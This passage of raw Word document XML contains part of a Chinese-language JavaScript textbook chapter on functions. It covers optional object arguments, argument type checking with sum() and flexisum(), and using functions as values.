        <w:t>开始复制原始数组的</w:t>
      </w:r>
      <w:r>
        <w:t>from_start</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并且将其复制至目标数组的</w:t>
      </w:r>
      <w:r>
        <w:t>to_start</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>要记住实参的顺序并不容易</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function arraycopy(/*array*/from,/*index*/from_start,/*array*/to,/*index*/to_start,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/*integer*/length)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>逻辑代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个版本的实现效率稍微有些低，但你不必再去记住实参的顺序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>并且</w:t>
      </w:r>
      <w:r>
        <w:t>from_start</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>to_start</w:t>
      </w:r>
      <w:r>
        <w:t>都默认为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function easycopy(args){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>arraycopy(args.from,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>args.from_start||0,//</w:t>
      </w:r>
      <w:r>
        <w:t>注意这里设置了默认值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>args.to,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>args.to_start||0,args.length);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>来看如何调用</w:t>
      </w:r>
      <w:r>
        <w:t>easycopy()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[1,2,3,4],b=[];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>easycopy({from:a,to:b,length:4});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="203" w:name="8_3_4_Shi_Can_Lei_Xing_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>8.3.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　实参类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>方法的形参并未声明类</w:t>
      </w:r>
      <w:r>
        <w:t>型，在形参传入函数体之前也未做任何类型检查。可以采用语义化的单词来给函数实参命名，或者像刚才的示例代码中的</w:t>
      </w:r>
      <w:r>
        <w:t>arraycopy()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样给实参补充注释，以此使代码自文档化，对于可选的实参来说，可以在注释中补充一下</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>这个实参是可选的</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。当一个方法可以接收任意数量的实参时，可以使用省略号：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function max(/*number...*/){/*</w:t>
      </w:r>
      <w:r>
        <w:t>代码区</w:t>
      </w:r>
      <w:r>
        <w:t>*/}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>3.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　节已经提到，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>在必要的时候会进行类型转换。因此如果函数期望接收一个字符串实参，而调用函数时传入其他类型的值，所传入的值会</w:t>
      </w:r>
      <w:r>
        <w:t>在函数体内将其用做字符串的地方转换为字符串类型。所有的原始类型都可以转换为字符串，所有的对象都包含</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（尽管不一定有用），所以这种场景下是不会有任何错误的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>然而事情不总是这样，回头看一下刚才提到的</w:t>
      </w:r>
      <w:r>
        <w:t>arraycopy()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。这个方法期望它的第一个实参是一个数组。当传入一个非数组的值作为第一个实参时（通常会传入类数组对象），尽管看起来是</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>没问题的，实际上会出错。除非所写的函数是只用到一两次的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>用完即丢</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>函数，你应当添加类似的实参类型检查逻辑，因为宁愿程序在传入非法值时报错，也不愿非法值导致</w:t>
      </w:r>
      <w:r>
        <w:t>程序在执行时报错，相比而言，逻辑执行时的报错消息不甚清晰且更难处理。下面这个例子中的函数就做了这种类型检查。注意这里使用了</w:t>
      </w:r>
      <w:r>
        <w:t>7.11</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>isArrayLike()</w:t>
      </w:r>
      <w:r>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回数组（或类数组对象）</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>的元素的累加和</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>数组</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>中必须为数字、</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>的元素都将忽略</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function sum(a){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(isArrayLike(a)){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var total=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>遍历所有元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var element=a[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(element==null)continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(isFinite(element))total+=element;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else throw new Error("sum():elements must be finite numbers");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return total;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else throw new Error("sum():argument must be array-like");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这里的</w:t>
      </w:r>
      <w:r>
        <w:t>sum()</w:t>
      </w:r>
      <w:r>
        <w:t>方法进行了非常严格的实参检查，当传入非法的值时</w:t>
      </w:r>
      <w:r>
        <w:t>会给出容易看懂的错误提示信息。但当涉及类数组对象和真正的数组（不考虑数组元素是否是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>还是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>），这种做法带来的灵活性其实并不大。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是一种非常灵活的弱类型语言，有时适合编写实参类型和实参个数的不确定性的函数。接下来的</w:t>
      </w:r>
      <w:r>
        <w:t>flexisum()</w:t>
      </w:r>
      <w:r>
        <w:t>方法就是这样（可能走向了一个极端）。比如，它可以接收任意数量的实参，并可以递归地处理实参是数组的情况，这样的话，它就可以用做不定实参函数或者实参是数组的函数。此外，这个方法尽可能的在抛出异常之前将非数字转换为数字：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f</w:t>
      </w:r>
      <w:r>
        <w:t>lexisum(a){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var total=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>arguments.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var element=arguments[i],n;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(element==null)continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>忽略</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>实参</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(isArray(element))//</w:t>
      </w:r>
      <w:r>
        <w:t>如果实参是数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n=flexisum.apply(this,element);//</w:t>
      </w:r>
      <w:r>
        <w:t>递归地计算累加和</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(typeof element==="function")//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，如果是函数</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n=Number(element());//</w:t>
      </w:r>
      <w:r>
        <w:t>调用它并做类型转换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n=Number(element);//</w:t>
      </w:r>
      <w:r>
        <w:t>否则直接做类型转换</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(isNaN(n))//</w:t>
      </w:r>
      <w:r>
        <w:t>如果无法转换为数字，则抛出异常</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw Error("flexisum():can't convert"+element+"to number");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>total+=n;//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，将</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>累加至</w:t>
      </w:r>
      <w:r>
        <w:t>total</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return total;</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204" w:name="8_4_Zuo_Wei_Zhi_De_Han_Shu_"/>
      <w:r>
        <w:t>8.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　作为值的函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="204"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数可以定义，也可以调用，这是函数最重要的特性。函数定义和调用是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的词法特性，对于其他大多数编程语言来说</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>亦是如此。然而在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，函数不仅是一种语法，也是值，也就是说，可以将函数赋值给变量，存储在对象的属性或数组的元素中，作为参数传入另外一个函数等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了便于理解</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的函数是如何用做数据的以及</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语法，来看一下这样一个函数定义：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function square(x){return x*x;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个定义创建一个新的函数对象，并将其赋值</w:t>
      </w:r>
      <w:r>
        <w:t>给变量</w:t>
      </w:r>
      <w:r>
        <w:t>square</w:t>
      </w:r>
      <w:r>
        <w:t>。函数的名字实际上是看不见的，它（</w:t>
      </w:r>
      <w:r>
        <w:t>square</w:t>
      </w:r>
      <w:r>
        <w:t>）仅仅是变量的名字，这个变量指代函数对象。函数还可以赋值给其他的变量，并且仍可以正常工作：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s=square;//</w:t>
      </w:r>
      <w:r>
        <w:t>现在</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>square</w:t>
      </w:r>
      <w:r>
        <w:t>指代同一个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>square(4);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>s(4);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了可以将函数赋值给变量，同样可以将函数赋值给对象的属性。当函数作为对象的属性调用时，函数就称为方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={square:function(x){return x*x;}};//</w:t>
      </w:r>
      <w:r>
        <w:t>对象直接量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var y=o.squar</w:t>
      </w:r>
      <w:r>
        <w:t>e(16);//y</w:t>
      </w:r>
      <w:r>
        <w:t>等于</w:t>
      </w:r>
      <w:r>
        <w:t>256</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数甚至不需要带名字，当把它们赋值给数组元素时：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[function(x){return x*x;},20];//</w:t>
      </w:r>
      <w:r>
        <w:t>数组直接量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a[0](a[1]);//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>400</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后一句代码看起来很奇怪，但的确是合法的函数调用表达式！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>8-2</w:t>
      </w:r>
      <w:r>
        <w:t>展示了将函数用做值时的一些例子，这段代码可能会难读一些，但注释解释了代码的具体含义：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>8-2</w:t>
      </w:r>
      <w:r>
        <w:t>：将函数用做值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在这里定义一些简单的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function add(x,y){return x+y;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
